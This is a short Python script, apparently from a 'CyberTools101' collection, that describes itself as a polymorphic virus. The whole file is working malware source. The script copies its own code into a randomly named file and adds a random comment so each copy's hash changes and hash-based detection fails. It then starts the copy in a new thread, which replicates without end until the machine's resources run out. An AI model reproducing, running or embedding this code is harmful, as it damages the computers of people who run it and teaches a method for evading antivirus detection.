#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 28 22:16:15 2023
Purpose: This is just a generic example of a polymorphic virus. When ran, it creates a copy of itself
         along wtih a random string to generate a new hash making it harder to be discovered. This virus
         main purpose is to consume system resources and slow down the computer.

Warning: THIS WILL FILL YOUR COMPUTER WITH PYTHON FILES AND CONSUME RESOURCES INTO A SCREECHING HALT!
@author: CyberTools101
"""

import os
from threading import Thread
import sys
import random
import string

#copy the contents of the files into another file
def writeIntoFile(file, lines):
    count = len(lines)
    start = 0
    for line in lines:
        start = start + 1
        # we dont want to copy the random string added to the end
        if start == (count - 1):
            break
        file.write(line)

#get current dir and file name
directory = os.getcwd()
thisfile = os.path.basename(__file__)


# get the current file content
f = open(thisfile, "r")
lines = f.readlines()
f.close()

#create new file with random name
filename = "{randomness}.py".format(
        randomness="".join(random.choices(string.ascii_lowercase + string.digits, k=5)))

#create new file and copy the content of the parent file
i = open(directory + "\\" + filename, "w")
writeIntoFile(i, lines)

#add some randomness to change the hash value
i.write('\n#{chaos}'.format(chaos="".join(random.choices(string.ascii_lowercase + string.digits, k=5))))
i.close()

def runFuncv():
    os.system('python3 .\\' + filename)

# run the new file 
thread = Thread(target=runFuncv)
thread.start()






#this is the end
